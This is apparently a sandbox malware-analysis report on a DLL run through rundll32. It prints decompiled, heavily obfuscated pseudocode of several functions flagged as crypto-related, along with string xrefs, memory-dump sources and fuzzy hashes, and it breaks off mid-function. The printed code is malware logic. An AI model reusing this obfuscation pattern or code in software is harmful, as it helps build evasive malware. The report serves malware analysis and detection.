0x1001d3a1
0x1001d3b4
0x1001d3cd
0x1001d3d2
0x1001d3d5
0x00000000
0x1001d3d5
0x1001d31d
0x1001d31f
0x00000000
0x00000000
0x00000000
0x1001d342
0x1001d3e3
0x1001d3ec
0x1001d3f0
0x1001d3fb
0x1001d400
0x1001d41d
0x1001d423
0x1001d43d
0x1001d459
0x1001d45e
0x1001d461
0x1001d463
0x1001d463
0x1001d463
0x00000000

Strings

]d, xrefs: 1001D298
1, xrefs: 1001D22D
6Lc*, xrefs: 1001D2FB
$[, xrefs: 1001D2DD
5K, xrefs: 1001D0F3
wy, xrefs: 1001D1E2
p, xrefs: 1001CFE1
`Q, xrefs: 1001D0D8
34, xrefs: 1001D273
d6, xrefs: 1001CF5C
w., xrefs: 1001D023
#, xrefs: 1001D166

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $[$34$5K$6Lc*$]d$`Q$d6$p$w.$wy$#$1
API String ID: 0-530726773
Opcode ID: 67cde31ab4aaa1297ce490e8de25fc54b96280282ef89898081d4889953db2fa
Instruction ID: 2b7911bf1170a3f66cf7f6c7fde12c602fe471581fcc29f1fad5001a1ae77b33
Opcode Fuzzy Hash: 67cde31ab4aaa1297ce490e8de25fc54b96280282ef89898081d4889953db2fa
Instruction Fuzzy Hash: 0AD100B140C3809FE3A8DF21C48955BFBE1FBC4758F608A1DF596862A0D7B59A49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1000A82A, Relevance: 15.2, Strings: 12, Instructions: 248
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1000A82A(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				unsigned int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				unsigned int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				unsigned int _v1684;
				signed int _v1688;
				signed int _t246;
				signed int _t256;
				signed int _t259;
				intOrPtr _t260;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t269;
				signed int _t280;
				void* _t281;
				signed int _t284;
				intOrPtr* _t288;
				signed int* _t289;

				_t289 =  &_v1688;
				_v1576 = 0x5606e7;
				_t288 = __edx;
				asm("stosd");
				_t260 = __ecx;
				_t281 = 0x29433eeb;
				_t262 = 0x31;
				asm("stosd");
				asm("stosd");
				_v1648 = 0x5e;
				_v1648 = _v1648 * 0x51;
				_v1648 = _v1648 / _t262;
				_v1648 = _v1648 ^ 0x000000b2;
				_v1608 = 0xfaae;
				_v1608 = _v1608 >> 1;
				_v1608 = _v1608 ^ 0x00007a06;
				_v1684 = 0x4979;
				_v1684 = _v1684 >> 0xc;
				_v1684 = _v1684 + 0xffffc915;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 ^ 0x07ffb16d;
				_v1628 = 0x8424;
				_v1628 = _v1628 | 0xf7e83d2b;
				_v1628 = _v1628 + 0xffff4dd0;
				_v1628 = _v1628 ^ 0xf7e868ea;
				_v1644 = 0x6b13;
				_v1644 = _v1644 * 0x56;
				_v1644 = _v1644 * 0x46;
				_v1644 = _v1644 ^ 0x09d5979b;
				_v1668 = 0xb73d;
				_v1668 = _v1668 | 0x838a5964;
				_v1668 = _v1668 + 0xffff529f;
				_v1668 = _v1668 | 0x37475c7f;
				_v1668 = _v1668 ^ 0xb7cf3f6b;
				_v1596 = 0xf024;
				_v1596 = _v1596 << 0xd;
				_v1596 = _v1596 ^ 0x1e04b6c0;
				_v1600 = 0xb340;
				_v1600 = _v1600 + 0x9e4b;
				_v1600 = _v1600 ^ 0x00015f07;
				_v1640 = 0x878a;
				_v1640 = _v1640 >> 0xd;
				_v1640 = _v1640 << 0x10;
				_v1640 = _v1640 ^ 0x000472fb;
				_v1632 = 0xe1cc;
				_v1632 = _v1632 << 7;
				_v1632 = _v1632 ^ 0x738f62b1;
				_v1632 = _v1632 ^ 0x73ff9899;
				_v1676 = 0x1c90;
				_v1676 = _v1676 + 0xffff8717;
				_v1676 = _v1676 ^ 0x1a5437a9;
				_v1676 = _v1676 ^ 0x0f8de9e7;
				_v1676 = _v1676 ^ 0xea264f5a;
				_v1588 = 0xf0f7;
				_v1588 = _v1588 >> 0xf;
				_v1588 = _v1588 ^ 0x000071fa;
				_v1680 = 0x2bed;
				_v1680 = _v1680 >> 7;
				_v1680 = _v1680 + 0xffffe2bf;
				_v1680 = _v1680 << 0xf;
				_v1680 = _v1680 ^ 0xf18b04ed;
				_v1656 = 0x75b0;
				_v1656 = _v1656 >> 0xe;
				_v1656 = _v1656 | 0x7f291ab9;
				_v1656 = _v1656 ^ 0x7f2916c4;
				_v1688 = 0xf681;
				_v1688 = _v1688 + 0xefc9;
				_v1688 = _v1688 + 0xffffb2a7;
				_v1688 = _v1688 + 0x706b;
				_v1688 = _v1688 ^ 0x00022092;
				_v1620 = 0x3c3c;
				_v1620 = _v1620 >> 3;
				_v1620 = _v1620 << 7;
				_v1620 = _v1620 ^ 0x0003cb70;
				_v1592 = 0x2a9f;
				_v1592 = _v1592 ^ 0xbb804955;
				_v1592 = _v1592 ^ 0xbb807f61;
				_v1636 = 0xf30f;
				_v1636 = _v1636 << 9;
				_v1636 = _v1636 + 0x1a35;
				_v1636 = _v1636 ^ 0x01e6548d;
				_v1660 = 0x7da3;
				_v1660 = _v1660 + 0xffff7443;
				_v1660 = _v1660 ^ 0x3d59d4ee;
				_v1660 = _v1660 ^ 0xc2a6057b;
				_v1652 = 0xa4d6;
				_v1652 = _v1652 | 0x5e93e0dd;
				_v1652 = _v1652 + 0xec99;
				_v1652 = _v1652 ^ 0x5e94e4e7;
				_v1604 = 0x6f75;
				_v1604 = _v1604 * 0x38;
				_v1604 = _v1604 ^ 0x001831e4;
				_v1624 = 0xa60f;
				_v1624 = _v1624 >> 0xe;
				_v1624 = _v1624 + 0xd99b;
				_v1624 = _v1624 ^ 0x0000849d;
				_v1584 = 0x9628;
				_v1584 = _v1584 >> 6;
				_v1584 = _v1584 ^ 0x000009d5;
				_v1580 = 0x622b;
				_v1580 = _v1580 | 0xc5c4ab70;
				_v1580 = _v1580 ^ 0xc5c4f09b;
				_v1612 = 0xe416;
				_v1612 = _v1612 | 0x8ee87fb2;
				_v1612 = _v1612 ^ 0x8ee8fcc1;
				_v1664 = 0x1353;
				_v1664 = _v1664 + 0xfffff795;
				_t280 = _v1612;
				_v1664 = _v1664 * 0xc;
				_v1664 = _v1664 + 0xffffc72c;
				_v1664 = _v1664 ^ 0x00001607;
				_v1672 = 0x8c9b;
				_v1672 = _v1672 + 0xa348;
				_v1672 = _v1672 + 0x3354;
				_v1672 = _v1672 ^ 0x755cc47e;
				_v1672 = _v1672 ^ 0x755dfb44;
				_v1616 = 0x2f85;
				_v1616 = _v1616 ^ 0x6b3f4203;
				_v1616 = _v1616 | 0x0d04e0b0;
				_v1616 = _v1616 ^ 0x6f3f88ec;
				do {
					while(_t281 != 0x8388688) {
						if(_t281 == 0x17743d70) {
							_t274 = _t288;
							_t246 = E100084D8(_t260, _t288, 0x100010bc,  &_v520);
							asm("sbb esi, esi");
							_pop(_t263);
							_t284 =  ~_t246 & 0x1eb1ddc8;
							L11:
							_t281 = _t284 + 0x8388688;
							continue;
						}
						if(_t281 == 0x26ea6450) {
							E1001BA7B(_v1648, _t263, _v1628, _v1644, _t263,  &_v1040, _v1668, _v1596);
							_push(_v1676);
							_push(_v1632);
							_push(_v1640);
							E1000487B(_v1680, __eflags, 0x1000115c, _v1656, _v1688, E1000B871(0x1000115c, _v1600, __eflags),  &_v1560,  &_v1040, _v1620,  &_v520);
							_t268 = _v1592;
							E1000717B(_t268, _v1636, _v1660, _t249, _v1652);
							_push(_v1580);
							_push(0);
							_push(_t268);
							_push(_v1584);
							_t263 = 0;
							_push(_v1624);
							_t274 = _v1604;
							_push( &_v1560);
							_push(0);
							_t256 = E1001B0D5(0, _v1604, __eflags);
							_t289 =  &(_t289[0x1c]);
							asm("sbb esi, esi");
							_t284 =  ~_t256 & 0x23e0ea45;
							__eflags = _t284;
							goto L11;
						}
						if(_t281 != 0x29433eeb) {
							if(_t281 == 0x2c1970cd) {
								 *((intOrPtr*)(_t280 + 0x34)) = _t260;
								_t259 =  *0x1002140c; // 0x0
								 *(_t280 + 0x2c) = _t259;
								 *0x1002140c = _t280;
								return _t259;
							}
							goto L14;
						}
						_t269 = 0x3c;
						_t256 = E1000A0AD(_t269, _t274);
						_t280 = _t256;
						_t263 = _t263;
						__eflags = _t280;
						if(_t280 != 0) {
							_t281 = 0x17743d70;
							continue;
						}
						return _t256;
					}
					_t263 = _v1612;
					E100033F4(_t263, _v1664, _v1672, _v1616, _t280);
					_t289 =  &(_t289[3]);
					_t281 = 0x21a92c00;
					L14:
					__eflags = _t281 - 0x21a92c00;
				} while (_t281 != 0x21a92c00);
				return _t256;
			}

0x1000a82a
0x1000a830
0x1000a845
0x1000a847
0x1000a848
0x1000a84e
0x1000a853
0x1000a854
0x1000a855
0x1000a856
0x1000a863
0x1000a86d
0x1000a871
0x1000a879
0x1000a881
0x1000a885
0x1000a88d
0x1000a895
0x1000a89a
0x1000a8a2
0x1000a8a7
0x1000a8af
0x1000a8b7
0x1000a8bf
0x1000a8c7
0x1000a8cf
0x1000a8dc
0x1000a8e5
0x1000a8e9
0x1000a8f1
0x1000a8f9
0x1000a901
0x1000a909
0x1000a911
0x1000a919
0x1000a921
0x1000a926
0x1000a92e
0x1000a936
0x1000a93e
0x1000a946
0x1000a94e
0x1000a953
0x1000a958
0x1000a960
0x1000a968
0x1000a96d
0x1000a975
0x1000a97d
0x1000a985
0x1000a98d
0x1000a995
0x1000a99d
0x1000a9a5
0x1000a9ad
0x1000a9b2
0x1000a9ba
0x1000a9c2
0x1000a9c7
0x1000a9cf
0x1000a9d4
0x1000a9dc
0x1000a9e4
0x1000a9e9
0x1000a9f1
0x1000a9f9
0x1000aa01
0x1000aa09
0x1000aa11
0x1000aa19
0x1000aa21
0x1000aa29
0x1000aa2e
0x1000aa33
0x1000aa3b
0x1000aa43
0x1000aa4b
0x1000aa53
0x1000aa5b
0x1000aa60
0x1000aa68
0x1000aa70
0x1000aa78
0x1000aa80
0x1000aa88
0x1000aa90
0x1000aa98
0x1000aaa0
0x1000aaa8
0x1000aab0
0x1000aabd
0x1000aac1
0x1000aac9
0x1000aad1
0x1000aad6
0x1000aade
0x1000aae6
0x1000aaee
0x1000aaf3
0x1000aafb
0x1000ab03
0x1000ab0b
0x1000ab13
0x1000ab1b
0x1000ab23
0x1000ab2b
0x1000ab33
0x1000ab40
0x1000ab44
0x1000ab48
0x1000ab50
0x1000ab58
0x1000ab60
0x1000ab68
0x1000ab70
0x1000ab78
0x1000ab80
0x1000ab88
0x1000ab90
0x1000ab98
0x1000aba0
0x1000aba0
0x1000abb2
0x1000acee
0x1000acf8
0x1000ad02
0x1000ad04
0x1000ad05
0x1000acdc
0x1000acdc
0x00000000
0x1000acdc
0x1000abbe
0x1000ac2d
0x1000ac32
0x1000ac3b
0x1000ac3f
0x1000ac85
0x1000ac97
0x1000ac9e
0x1000acad
0x1000acb1
0x1000acb3
0x1000acb4
0x1000acbb
0x1000acbd
0x1000acc1
0x1000acc5
0x1000acc6
0x1000acc8
0x1000accd
0x1000acd4
0x1000acd6
0x1000acd6
0x00000000
0x1000acd6
0x1000abc6
0x1000abce
0x1000abd4
0x1000abd7
0x1000abdc
0x1000abdf
0x00000000
0x1000abdf
0x00000000
0x1000abce
0x1000abfb
0x1000abfc
0x1000ac01
0x1000ac03
0x1000ac04
0x1000ac06
0x1000ac08
0x00000000
0x1000ac08
0x1000abef
0x1000abef
0x1000ad1a
0x1000ad1e
0x1000ad23
0x1000ad26
0x1000ad2b
0x1000ad2b
0x1000ad2b
0x00000000

Strings

+, xrefs: 1000A9BA
yI, xrefs: 1000A88D
kp, xrefs: 1000AA11
+b, xrefs: 1000AAFB
uo, xrefs: 1000AAB0
^, xrefs: 1000A856
>C), xrefs: 1000ABC0
>C), xrefs: 1000A84E
<<, xrefs: 1000AA21
ZO&, xrefs: 1000A99D
T3, xrefs: 1000AB68
Pd&, xrefs: 1000ABB8

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +b$<<$Pd&$T3$ZO&$^$kp$uo$yI$+$>C)$>C)
API String ID: 0-4081541337
Opcode ID: 99596bd59956dc6f0890cc4c21fccb82333c18219d464022e760333394f0e9ed
Instruction ID: 4e55034426b78a8bb4e50d354b6abb894fff3114ee81c311717921f57d8810c9
Opcode Fuzzy Hash: 99596bd59956dc6f0890cc4c21fccb82333c18219d464022e760333394f0e9ed
Instruction Fuzzy Hash: 67C131B24087819FE364CF61C48A84BFBE1FB85798F504A1DF5A696260D3B58A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10019726, Relevance: 14.0, Strings: 11, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10019726() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				signed int _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				signed int _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t261;
				void* _t264;
				void* _t265;
				signed int _t270;
				signed int _t273;
				void* _t274;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t306;
				signed int _t308;
				void* _t310;
				void* _t312;
				signed int* _t317;

				_t317 =  &_v676;
				_v568 = _v568 & 0x00000000;
				_v576 = 0x70a621;
				_v572 = 0x4b958f;
				_v592 = 0x110;
				_v592 = _v592 * 6;
				_t274 = 0;
				_v592 = _v592 ^ 0x000006e0;
				_t310 = 0x341cbaaf;
				_v664 = 0x72d7;
				_v664 = _v664 >> 2;
				_v664 = _v664 >> 3;
				_v664 = _v664 + 0x1095;
				_v664 = _v664 ^ 0x0000142a;
				_v612 = 0x5600;
				_v612 = _v612 >> 0xe;
				_t276 = 0x49;
				_v612 = _v612 * 0x67;
				_v612 = _v612 ^ 0x00002fd5;
				_v624 = 0x3d73;
				_v624 = _v624 ^ 0x16f8d688;
				_v624 = _v624 ^ 0x3e44d01c;
				_v624 = _v624 ^ 0x28bc18ee;
				_v596 = 0xa850;
				_v596 = _v596 / _t276;
				_v596 = _v596 ^ 0x000061c2;
				_v648 = 0xb1f6;
				_v648 = _v648 ^ 0x9af47db8;
				_t277 = 0x46;
				_t308 = 0x4f;
				_v648 = _v648 * 0x4d;
				_v648 = _v648 / _t277;
				_v648 = _v648 ^ 0x02391632;
				_v656 = 0x4233;
				_v656 = _v656 / _t308;
				_t278 = 0x66;
				_v656 = _v656 / _t278;
				_v656 = _v656 | 0x0a6d2d93;
				_v656 = _v656 ^ 0x0a6d7884;
				_v672 = 0xe0bc;
				_t279 = 0x52;
				_v672 = _v672 / _t279;
				_v672 = _v672 ^ 0xc600776a;
				_v672 = _v672 + 0x89e;
				_v672 = _v672 ^ 0xc600340a;
				_v620 = 0x30ae;
				_v620 = _v620 * 5;
				_v620 = _v620 << 0xb;
				_v620 = _v620 ^ 0x079b4f2a;
				_v604 = 0x380f;
				_v604 = _v604 * 0x62;
				_v604 = _v604 ^ 0x00153721;
				_v660 = 0xc676;
				_v660 = _v660 + 0xffffa410;
				_v660 = _v660 >> 4;
				_v660 = _v660 >> 8;
				_v660 = _v660 ^ 0x00003ae5;
				_v628 = 0x394c;
				_v628 = _v628 | 0x38293f57;
				_t109 =  &_v628; // 0x38293f57
				_v628 =  *_t109 / _t308;
				_v628 = _v628 ^ 0x00b5c034;
				_v668 = 0xe0c5;
				_v668 = _v668 | 0x9868edc1;
				_v668 = _v668 ^ 0x4cd86501;
				_t280 = 0xb;
				_v668 = _v668 * 0x12;
				_v668 = _v668 ^ 0xf4699428;
				_v676 = 0xc11b;
				_v676 = _v676 + 0xffff1168;
				_v676 = _v676 + 0x7b8f;
				_v676 = _v676 ^ 0x8f34ce76;
				_v676 = _v676 ^ 0x8f349e8f;
				_v600 = 0x961;
				_v600 = _v600 / _t280;
				_v600 = _v600 ^ 0x0000361c;
				_v636 = 0x9dbe;
				_v636 = _v636 << 0xe;
				_v636 = _v636 ^ 0x8c25849e;
				_v636 = _v636 ^ 0xab4a34db;
				_v640 = 0x3a56;
				_v640 = _v640 ^ 0x3cec38c1;
				_v640 = _v640 + 0xffff3783;
				_v640 = _v640 ^ 0x3ceb634b;
				_v632 = 0x54db;
				_t281 = 0x68;
				_v632 = _v632 / _t281;
				_v632 = _v632 << 8;
				_v632 = _v632 ^ 0x0000c158;
				_v608 = 0xceff;
				_v608 = _v608 | 0xed47735e;
				_v608 = _v608 ^ 0xed47d3a2;
				_v644 = 0xc34d;
				_t282 = 0x36;
				_v644 = _v644 / _t282;
				_t261 = _v644;
				_t283 = 0x12;
				_t306 = _t261 % _t283;
				_t309 = _v608;
				_v644 = _t261 / _t283;
				_v644 = _v644 + 0x2bb8;
				_v644 = _v644 ^ 0x00005814;
				_v652 = 0x45a0;
				_v652 = _v652 + 0xffff236f;
				_v652 = _v652 + 0xd858;
				_v652 = _v652 + 0xbd27;
				_v652 = _v652 ^ 0x0000dcd2;
				_v616 = 0xf534;
				_v616 = _v616 + 0xfffff95c;
				_v616 = _v616 * 0x7e;
				_v616 = _v616 ^ 0x00756ae3;
				do {
					while(_t310 != 0x198406b1) {
						if(_t310 == 0x1d5a9c77) {
							_t306 = _v612;
							_t265 = E1001B82F( &_v524, _t306, __eflags, _v624);
							_t283 = _t283;
							__eflags = _t265;
							if(__eflags != 0) {
								_t310 = 0x2d1497d2;
								continue;
							}
						} else {
							if(_t310 == 0x24120489) {
								_t306 = _v608;
								_t283 = _v632;
								E1001D7CE(_t283, _t306, _v644,  &_v588, _v652);
								_t317 =  &(_t317[3]);
								_t310 = 0x198406b1;
								continue;
							} else {
								if(_t310 == 0x2b605de5) {
									_t270 = E10013A87(_v660, _v628, _v668, _t283,  &_v564, _t283, _v676, _t309);
									_t306 = _v636;
									_t283 = _v600;
									asm("sbb esi, esi");
									_t310 = ( ~_t270 & 0x00c828b9) + 0x2349dbd0;
									E1000ADFC(_t283, _t306, _t309, _v640);
									_t317 =  &(_t317[8]);
									goto L19;
								} else {
									if(_t310 == 0x2d1497d2) {
										_t306 = _v648;
										_t283 = _v596;
										_t273 = E100139A2(_t283, _t306, _v664, _v656, 0, _v592, _v616, _t283, _v672, _v620, _t283,  &_v524, _v604);
										_t309 = _t273;
										_t317 =  &(_t317[0xb]);
										__eflags = _t273 - 0xffffffff;
										if(__eflags != 0) {
											_t310 = 0x2b605de5;
											continue;
										}
									} else {
										if(_t310 != 0x341cbaaf) {
											goto L19;
										} else {
											_t310 = 0x1d5a9c77;
											continue;
										}
									}
								}
							}
						}
						goto L20;
					}
					_t264 = E100172DA(_t283);
					_t312 = _v588 - _v548;
					_t283 = _v584;
					asm("sbb ecx, [esp+0x94]");
					__eflags = _t283 - _t306;
					if(__eflags >= 0) {
						if(__eflags > 0) {
							L17:
							_t274 = 1;
							__eflags = 1;
						} else {
							__eflags = _t312 - _t264;
							if(_t312 >= _t264) {
								goto L17;
							}
						}
					}
					_t310 = 0x2349dbd0;
					L19:
					__eflags = _t310 - 0x2349dbd0;
				} while (__eflags != 0);
				L20:
				return _t274;
			}

0x10019726
0x1001972c
0x10019733
0x1001973b
0x10019743
0x10019754
0x10019758
0x1001975a
0x10019762
0x10019767
0x1001976f
0x10019774
0x10019779
0x10019781
0x10019789
0x10019791
0x1001979d
0x100197a0
0x100197a4
0x100197ac
0x100197b4
0x100197bc
0x100197c4
0x100197cc
0x100197dc
0x100197e0
0x100197e8
0x100197f0
0x100197fd
0x10019800
0x10019803
0x1001980f
0x10019813
0x1001981b
0x1001982b
0x10019833
0x10019838
0x1001983e
0x10019846
0x1001984e
0x1001985a
0x1001985d
0x10019861
0x10019869
0x10019871
0x10019879
0x10019886
0x1001988a
0x1001988f
0x10019897
0x100198a4
0x100198a8
0x100198b0
0x100198b8
0x100198c2
0x100198cc
0x100198d1
0x100198d9
0x100198e1
0x100198e9
0x100198f1
0x100198f7
0x100198ff
0x10019907
0x1001990f
0x1001991c
0x1001991f
0x10019923
0x1001992b
0x10019933
0x1001993b
0x10019943
0x1001994b
0x10019953
0x10019963
0x10019967
0x1001996f
0x10019977
0x1001997c
0x10019984
0x1001998c
0x10019994
0x1001999c
0x100199a4
0x100199ac
0x100199b8
0x100199bd
0x100199c3
0x100199c8
0x100199d0
0x100199d8
0x100199e0
0x100199e8
0x100199f4
0x100199f9
0x100199ff
0x10019a03
0x10019a04
0x10019a06
0x10019a0a
0x10019a0e
0x10019a16
0x10019a1e
0x10019a26
0x10019a2e
0x10019a36
0x10019a3e
0x10019a46
0x10019a4e
0x10019a5b
0x10019a5f
0x10019a67
0x10019a67
0x10019a79
0x10019b72
0x10019b7d
0x10019b83
0x10019b84
0x10019b86
0x10019b88
0x00000000
0x10019b88
0x10019a7f
0x10019a85
0x10019b53
0x10019b57
0x10019b5b
0x10019b60
0x10019b63
0x00000000
0x10019a8b
0x10019a91
0x10019b1c
0x10019b25
0x10019b2b
0x10019b32
0x10019b3a
0x10019b3c
0x10019b41
0x00000000
0x10019a93
0x10019a99
0x10019ad9
0x10019add
0x10019ae4
0x10019ae9
0x10019aeb
0x10019aee
0x10019af1
0x10019af7
0x00000000
0x10019af7
0x10019a9b
0x10019aa1
0x00000000
0x10019aa7
0x10019aa7
0x00000000
0x10019aa7
0x10019aa1
0x10019a99
0x10019a91
0x10019a85
0x00000000
0x10019a79
0x10019b92
0x10019b9b
0x10019ba2
0x10019ba6
0x10019bad
0x10019baf
0x10019bb1
0x10019bb7
0x10019bb9
0x10019bb9
0x10019bb3
0x10019bb3
0x10019bb5
0x00000000
0x00000000
0x10019bb5
0x10019bb1
0x10019bba
0x10019bbc
0x10019bbc
0x10019bbc
0x10019bc7
0x10019bd0

Strings

W?)8, xrefs: 100198E9
]`+, xrefs: 10019AF7
4, xrefs: 10019871
Kc<, xrefs: 100199A4
ju, xrefs: 10019A5F
^sG, xrefs: 100199D8
:, xrefs: 100198D1
a, xrefs: 10019953
3B, xrefs: 1001981B
]`+, xrefs: 10019A8B
s=, xrefs: 100197AC

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4$3B$Kc<$W?)8$^sG$a$s=$:$]`+$]`+$ju
API String ID: 0-1108746688
Opcode ID: 13f7924de4efc1a26915373cde2b421b2759c9b0f560f712709678b3f00ac7b4
Instruction ID: 974e66e0197bb2d16694a4be403b543c53e555b20dc579415d922ec80e5edbbd
Opcode Fuzzy Hash: 13f7924de4efc1a26915373cde2b421b2759c9b0f560f712709678b3f00ac7b4
Instruction Fuzzy Hash: 87C132719083809FE358CE24D58980BBBE2FBC5758F50891DF5859A2A0D3B5D989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10007B6A, Relevance: 14.0, Strings: 11, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10007B6A() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _t191;
				char _t202;
				intOrPtr _t204;
				signed int _t206;
				intOrPtr _t212;
				intOrPtr _t214;
				void* _t228;
				char _t229;
				signed int* _t230;
				void* _t232;

				_t230 =  &_v116;
				_v16 = 0x5e81c1;
				_v12 = 0x2cd88b;
				_t204 = 0;
				_v8 = 0;
				_v108 = 0x6d49;
				_v108 = _v108 | 0x2700fbf2;
				_v108 = _v108 ^ 0x7ba83efc;
				_v108 = _v108 * 0x70;
				_t228 = 0x2799d4e7;
				_v108 = _v108 ^ 0x89d45535;
				_v80 = 0x2091;
				_v80 = _v80 + 0x273e;
				_v80 = _v80 | 0x48cd89b5;
				_v80 = _v80 ^ 0x48cd8ecb;
				_v96 = 0xade8;
				_v96 = _v96 ^ 0x4d2e60b6;
				_v96 = _v96 >> 7;
				_v96 = _v96 | 0x97267b2c;
				_v96 = _v96 ^ 0x97be4015;
				_v72 = 0xfc61;
				_v72 = _v72 + 0xf1f;
				_t206 = 0x3b;
				_v72 = _v72 * 0x21;
				_v72 = _v72 ^ 0x00220c57;
				_v52 = 0x897e;
				_v52 = _v52 ^ 0xbe5b8687;
				_v52 = _v52 ^ 0xbe5b2db8;
				_v88 = 0x37a4;
				_v88 = _v88 + 0xa8c2;
				_v88 = _v88 + 0xffff2c1a;
				_v88 = _v88 ^ 0x000075a0;
				_v116 = 0x6663;
				_v116 = _v116 | 0x6e7d69df;
				_v116 = _v116 << 4;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x39f5f6c6;
				_v60 = 0xb6fb;
				_v60 = _v60 * 0x4a;
				_v60 = _v60 ^ 0x0034d1c0;
				_v92 = 0x37a8;
				_v92 = _v92 + 0x9819;
				_v92 = _v92 / _t206;
				_v92 = _v92 + 0xffffa4e1;
				_v92 = _v92 ^ 0xffff93da;
				_v48 = 0x9580;
				_v48 = _v48 + 0x560f;
				_v48 = _v48 ^ 0x0000bbd2;
				_v112 = 0x19fc;
				_v112 = _v112 | 0xd173ad24;
				_v112 = _v112 + 0xffffa860;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x68b9deb4;
				_v84 = 0xe15b;
				_v84 = _v84 * 0xb;
				_v84 = _v84 << 0x10;
				_v84 = _v84 ^ 0xaee96907;
				_v56 = 0x122d;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0x0004c40f;
				_v100 = 0x9763;
				_v100 = _v100 + 0x4ee4;
				_v100 = _v100 << 4;
				_v100 = _v100 * 0x3d;
				_v100 = _v100 ^ 0x036d86a5;
				_v76 = 0x44af;
				_v76 = _v76 ^ 0x8477c8e8;
				_v76 = _v76 | 0x9fc7da12;
				_v76 = _v76 ^ 0x9ff7da9a;
				_v104 = 0x645c;
				_v104 = _v104 | 0xa4f301c7;
				_v104 = _v104 << 9;
				_v104 = _v104 | 0x9f66b1ac;
				_v104 = _v104 ^ 0xffefbcf7;
				_v64 = 0xb1a6;
				_v64 = _v64 >> 0xe;
				_v64 = _v64 * 0x11;
				_v64 = _v64 ^ 0x00005887;
				_v44 = 0x7ce6;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x000039dd;
				_v68 = 0x5960;
				_v68 = _v68 + 0xd1a5;
				_v68 = _v68 * 0x6d;
				_v68 = _v68 ^ 0x007f5027;
				_t229 = _v40;
				_t227 = _v40;
				goto L1;
				do {
					while(1) {
						L1:
						_t232 = _t228 - 0x30b1a418;
						if(_t232 > 0) {
							break;
						}
						if(_t232 == 0) {
							E100033F4(_v56, _v100, _v76, _v104, _v36);
							_t230 =  &(_t230[3]);
							_t228 = 0x39266751;
							continue;
						}
						if(_t228 == 0x17278654) {
							_t229 = E1000D43E();
							_t228 = 0x3278c10e;
							continue;
						}
						if(_t228 == 0x23b8b33e) {
							_t212 =  *0x10021fd8; // 0x0
							E1000E735(_t212 + 0x22c, _v24, _v20 + 1, _v112, _v84);
							_t214 =  *0x10021fd8; // 0x0
							_t230 =  &(_t230[3]);
							_t204 = 1;
							_t228 = 0x30b1a418;
							 *((intOrPtr*)(_t214 + 8)) = _v28;
							continue;
						}
						if(_t228 == 0x2799d4e7) {
							_t228 = 0x17278654;
							continue;
						}
						if(_t228 != 0x2c08842d) {
							goto L24;
						} else {
							_t228 = 0x39266751;
							if(_v40 > 2) {
								_t202 = E1000BA46(_v88, _v116,  *((intOrPtr*)(_t227 + 8)),  &_v32, _v60);
								_t230 =  &(_t230[3]);
								_v36 = _t202;
								if(_t202 != 0) {
									_t228 = 0x31094cdd;
								}
							}
							continue;
						}
					}
					if(_t228 == 0x31094cdd) {
						if(E100112B3(_v92,  &_v36,  &_v28, _v48) == 0) {
							_t228 = 0x30b1a418;
							goto L24;
